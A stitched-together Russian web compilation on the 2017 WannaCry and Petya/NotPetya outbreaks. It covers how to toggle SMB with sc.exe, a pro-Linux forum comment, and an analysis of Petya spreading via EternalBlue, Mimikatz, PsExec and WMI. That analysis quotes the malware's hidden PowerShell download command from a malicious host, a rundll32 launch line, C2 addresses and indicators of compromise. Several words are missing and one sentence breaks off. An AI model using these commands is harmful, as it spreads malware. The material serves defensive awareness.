Пытаются инфицировать , используя широко известную уязвимость в протоколе SMB (MS17-10).

В качестве превентивной меры можно отключить протоколы SMB (Server Message Block) на локальном .

Как отключить протокол SMB версии 1 на локальном :

– запустите

– в открывшемся окне после приглашения системы (C:\Windows\System32>) введите команду

sc.exe config lanmanworkstation depend= bowser/mrxsmb20/nsi

– нажмите клавишу Enter ;

– появится сообщение ;

– после приглашения системы (C:\Windows\System32>) введите команду

sc.exe config mrxsmb10 start= disabled

– нажмите клавишу Enter ;

– появится сообщение ChangeServiceConfig: успех ;

– закройте окно .

Как отключить протоколы SMB версии 2 и 3 на локальном :

– запустите от имени администратора системы;

– в открывшемся окне Администратор: Командная строка после приглашения системы (C:\Windows\System32>) введите команду

sc.exe config lanmanworkstation depend= bowser/mrxsmb10/nsi

– нажмите клавишу Enter ;

– появится сообщение ChangeServiceConfig: успех ;

– после приглашения системы (C:\Windows\System32>) введите команду

sc.exe config mrxsmb20 start= disabled

– нажмите клавишу Enter ;

– появится сообщение ChangeServiceConfig: успех ;

– закройте окно .

Как включить протокол SMB версии 1 на локальном :

– запустите от имени администратора системы;

– в открывшемся окне Администратор: Командная строка после приглашения системы (C:\Windows\System32>) введите команду

– нажмите клавишу Enter ;

– появится сообщение ChangeServiceConfig: успех ;

– после приглашения системы (C:\Windows\System32>) введите команду

sc.exe config mrxsmb10 start= auto

– нажмите клавишу Enter ;

– появится сообщение ChangeServiceConfig: успех ;

– закройте окно .

Как включить протоколы SMB версии 2 и 3 на локальном :

– запустите от имени администратора системы;

– в открывшемся окне Администратор: Командная строка после приглашения системы (C:\Windows\System32>) введите команду

sc.exe config lanmanworkstation depend= bowser/mrxsmb10/mrxsmb20/nsi

– нажмите клавишу Enter ;

– появится сообщение ChangeServiceConfig: успех ;

– после приглашения системы (C:\Windows\System32>) введите команду

sc.exe config mrxsmb20 start= auto

– нажмите клавишу Enter ;

– появится сообщение ChangeServiceConfig: успех ;

– закройте окно .

Примечания

1. После внесения этих изменений (включение или отключение протоколов SMB) необходимо перезагрузить.

2. При включении или отключении протокола SMB версии 2 в Windows также происходит включение или отключение протокола SMB версии 3. Это связано с использованием общего стека для этих протоколов.

3. Отключение протокола SMB версии 2 приведет к отключению некоторых функциональных возможностей Windows.

4. гигант не рекомендует отключать протокол SMB версии 2 или 3. Отключать протокол SMB версии 2 или 3 следует только в качестве временной меры устранения неполадок. Не оставляйте протокол SMB версии 2 или 3 надолго в

Та ерунда это.

Этот случай просто как бы намекает, мол ребята, кроме Windows есть еще и Linux, который кстати говоря бесплатен и на котором такие вещи практически невозможны.
Я бы кстати давно перешел на линь, но разработка держит. Хз как туда перетащить проекты и найти подходящую среду разработки.

Вот цитата взятая с сайта

Считается, что Unix-системы намного лучше защищены от компьютерных вирусов, в сравнении с операционными системами Windows. В принципе, до сих пор нет ни одного широко распространенного вируса для Linux, в то время как в среде Windows просто кишит всякой заразой . В большей степени это связано с системой прав доступа *nix-платформ, а также отсутствием (во многих дистрибутивах) предустановленных сетевых служб, которые принимают входящие соединения, и тем, что в Linux очень быстро исправляют уязвимости. Но несмотря на все приведенные доводы, вирусы все же могут поселится в недостаточно защищенных *nix-системах, а также осуществлять свою подлую работу.

А теперь приведу ответы на самые распространенные вопросы о вирусах в Линукс.
1. Есть ли в природе вирусы для Linux ?
Конечно же есть, но их количество ничтожно мало, по сравнению с операционной системой Windows.

2. Вирусы для Windows могут заразить ОС Linux?
Конечно могут, но при условии установленной программы Wine, которая является своеобразной средой для запуска win-приложений. В моей практике был случай, когда вирусы в папке.wine разрослись настолько, что их количество было более 17000, а суммарный размер составлял чуть более 1Gb. Но вреда от этих вирусов для Linux-систем - никакого. Ведь они могут действовать только в win-среде. Если в Windows нужно будет установить, например, просканировать систему, и не факт, что после этого все будет работать, то в Убунту я просто удалил паку.wine, после чего снова установил нужные win-программы. Моя Убунту никоим образом не пострадала от большого количества вирусов для Windows.

3. Это правда, что Linux безопаснее, чем Windows?
Да, это чистейшая правда. Приведу пример. Существует мнение, что вирусов на Linux мало потому, что его доля на рынке операционных систем крайне мала, поэтому и создают вирусы для Windows, из-за его большой популярности и распространенности. Будь Linux популярнее, и для него так же написали бы кучу вирусов. Но это не так. Если взять самое популярное ПО для web-серверов, то это будет Apache. По состоянию на 2013 год доля Apache на web-серверах составляет почти 45%, а доля IIS от Microsoft - 23.10% рынка. Из этого следует, что атаки хакеров должны быть активнее к большему числу интернет-ресурсов на Apache, и должно наблюдаться больше червей, вирусов и других вредоносных программ, которые будут нацелены на Apache и те операционные системы, под управлением которых он работает, чем на Windows и IIS. Но в жизни дела обстоят иначе. Уже много времени целью для сетевых червей и всевозможных атак есть IIS от Microsoft.

Основные достоинства Linux, в плане безопасности:

  • для *nix-платформ создано крайне мало вирусов;
  • существует большое количество разных Linux-дистрибутивов. Одни работают с.deb пакетами, другие с.RPM пакетами. Создание вируса, который будет одинаково хорошо работать во всех из них очень затруднительно;
  • в разных дистрибутивах по-умолчанию инсталлированы разные наборы, по-разному скомпилированного программного обеспечения, что также уменьшает вероятность массового заражения вирусом;
  • программы, которые скачаны из интернета, в Linux по-умолчанию не являются исполняемыми. Сперва их нужно сделать таковыми;
  • главным источником ПО в Linux являются проверенные(официальные) репозитории. Это дает право утверждать, что вероятность попадания вирусов в эти источники крайне мала.

В Интернете новая эпидемия вируса-вымогателя. Вредонос практически блокировал работу десятков крупных компаний, требуя за расшифрование жесткого диска каждой рабочей станции чуть менее $400.

Паника, порожденная новой эпидемией, создала информационный хаос: сначала антивирусные аналитики объявили второе пришествие WannaCry, затем вредонос был определен как комплекс новособранных вирусов-шифровальщиков «Петя» (Petya) и «Миша» (Misha). На данный момент ясно, что если в основе вируса и лежал Petya, то он был сильно модифицирован.

Модель распространения отчасти аналогична WannaCry — используется эксплойт к уязвимости MS17-010, который был усилен социальной инженерией с использованием уязвимости в MS Word. Заражение происходит после открытия пользователем почтового вложения или скачивания файла, которые эксплуатируют уязвимость CVE-2017-0199, опубликованную в апреле 2017 года. А распространение по другим компьютерам в сети уже обеспечивается целым набором техник:

  • воруя пароли пользователей или используя активные сессии для доступа к другим узлам сети (используется код утилиты Mimikatz).
  • через уязвимость в SMB (CVE-2017-0144, MS17-010) — с использованием того самого знаменитого эксплоита EthernalBlue, который был успешно применен в WannaCry.

Вредонос использует похищенные учетные записи, чтобы скопировать свое тело в шары admin$ и запускает их, используя легальную утилиту PsExec, служащую для удаленного управления компьютером.

Разработчик известной программы Mimikatz, подтвердил , что его видоизмененный код используется для извлечения паролей.

Код использования интерфейса WMI для запуска установки также был опубликован в блоге Microsoft.

Заражение же по вектору SMB идет с использованием уязвимости CVE-2017-0144 аналогично технике, использованной в WannaCry.

А вот модель шифрования существенно изменилась по сравнению с WannaCry. Вирус, проникая на компьютер, заражает MBR (главная загрузочная запись) системы и шифрует несколько первых блоков жесткого диска, включая Master File Table, делая недоступным весь жесткий диск пользователей, а не только отдельные файлы, как это обычно делаю вирусы-вымогатели.

Платить выкуп вымогателям точно не стоит, и не только по этическим соображениям: вирусные аналитики пришли к выводу, что расшифрование файлов после уплаты выкупа в принципе невозможно. Эта функция попросту не заложена во вредонос. По сути, это не эпидемия шифровальшика, а эпидемия вируса-вайпера (wiper-virus), уничтожающего данные.

По сообщениям СМИ в России с наибольшими проблемами столкнулись в корпорации «Роснефть», на продолжительное время были отключены основные сайты корпорации и сайт «Башнефть».

Массовые заражения зафиксированы во Франции, Испании, России, странах СНГ. В Украине от вируса пострадали десятки государственных и коммерческих организаций.

Кому это нужно?

Поскольку механизм восстановления не был заложен в код, возможны три различных варианта мотивации злоумышленников. Либо они хотели замаскировать под массовую эпидемию точечное уничтожение чьих-то конкретных данных, либо хотели заработать, изначально не собираясь ничего восстанавливать. Наименее вероятный вариант — это кибервандализм. Вирус — это серьезный продукт, и силы на его создание было бы разумнее потратить на что-то, приносящее деньги. Вандалы встречались в 1990-е годы, когда было модно ломать системы ради славы, но сейчас они крайне редки.

В итоге главными выгодоприобретателями эпидемий последних 2 месяцев стали, по-видимому, группа The Shadow Brokers, распространившая эксплоит EthernalBlue. Сами вымогатели собрали сравнительно небольшие суммы денег, не несколько порядков меньшие, чем объем ущерба, нанесенного эпидемией. Эпидемии стали отличной рекламой The Shadow Brokers, которые утверждают, что готовы продать информацию об остальных эксплоитах из архива АНБ. Ведь EthernalBlue — всего лишь единственный эксплоит из десятков, украденных у секретной службы в августе 2016 года.

Механизм атаки

Злоумышленник может присылать файлы или ссылки на них (на начальной стадии эпидемии это были файлы Петя.apx, myguy.exe, myguy.xls, Order-[любая дата].doc), через которые происходит заражение рабочей станции под управлением ОС Windows. Например, при открытии файла Order-[любая дата].doc происходит обращение к серверу 84.200.16.242 по порту 80 и загрузка xls:

powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\10807.exe");" (PID: [идентификатор процесса], Additional Context: (System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\[случайное число].exe") ;)

Затем вредонос пытается подключиться к серверам 111.90.139.247:80 и COFFEINOFFICE.XYZ:80, которые возможно являются серверам управления.

Индикаторами компрометации является наличие файлов:

C:\Windows\perfc.dat
C:\myguy.xls.hta

После закрепления на хосте происходит сканирование других Windows машин в сети и распространение за счет уязвимостей, описанных в MS17-010 (те же, что использовал WannaCry) по портам tcp:135, tcp:139, tcp:445, tcp:1024-1035.

Распространение также можно происходить за счет выполнение команды:

Remote WMI, “process call create "C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\perfc.dat\" #1”


Схема распространения заражения взята с blog.kryptoslogic.com

Как избежать заражения?

french-cooking.com:80
84.200.16.242:80
111.90.139.247:80
COFFEINOFFICE.XYZ:80

Петя.apx, myguy.exe, myguy.xls, Order-[любая дата].doc

3. Установить патчи

4. Настроить IPS на блокировку эксплойтов для MS17-010

5. Для защиты еще не зараженных узлов можно создать файл c:\windows\perfc без расширения. Заражение таких узлов не происходит.

За последние несколько недель цифровой мир пережил несколько серьёзных вирусных атак. В середине мая началась массовое заражение компьютеров вирусом WannaCry. Данная вредоносная программа создана для вымогания денежных средств. Зловред шифрует все пользовательские данные на компьютере под управлением операционной, после чего владельцу зараженного ПК предлагают заплатить выкуп в районе $300 (в криптовалюте биткоин) для получения дешифровального ключа. Совсем недавно появился еще один не менее опасный вирус - Petya.A. Он использует цифровую подпись Microsoft и маскируется под лицензионное приложение Windows.

Как и WannaCry, он использует уязвимость в системе под названием EternalBlue (CVE-2017-0144), через управление системными инструментами WMI и PsExec. У него нет удаленного активатора, как у его майского предшественника, он гораздо более хитрый, имеет широкие возможности по автоматическому распространению.

Как узнать, что ваш компьютер заражен Petya.A?

Персональный компьютер автоматически уходит на перезагрузку, после чего отображает экран с фейковой процедурой проверки жестких дисков системной утилитой CHKDSK. А пока пользователь якобы ждет завершения проверки, все данные на дисках начинают шифроваться вирусом. После завершения процесса шифрования, на экране появляется надпись с требованием выкупа.

Как защититься от вируса Petya.A?

Первое правило, которое актуально для всех пользователей и на все времена: не открывайте электронные письма от неизвестных отправителей. Особенно это касается писем, к которым прикреплены какие-то файлы. Для предотвращения распространения вируса, пользователь заранее должен отключить протокол SMB v1/v2/v3. Как это сделать, можно узнать из официальной инструкции на . Необходимо закрыть TCP-порты с 1024 по 1035, а также 135 и 445.


  • C:\Windows\perfc.dat

  • C:\myguy.xls.hta

  • %APPDATA%\10807.exe

Специалисты по сетевой безопасности заметили любопытную особенность. Если создать файл perfc (без расширения) в папке с операционной системой, это помешает вирусу запуститься на персональном компьютере. Если же компьютер самопроизвольно перезагрузился и начинается проверка диска, необходимо срочно его выключить и отключить ПК от сети, для избежания заражения других машин. По возможности, необходимо сделать копию ваших данных и попробовать восстановить загрузчик с помощью системной утилиты bootrec, загрузившись с диска или системной флешки.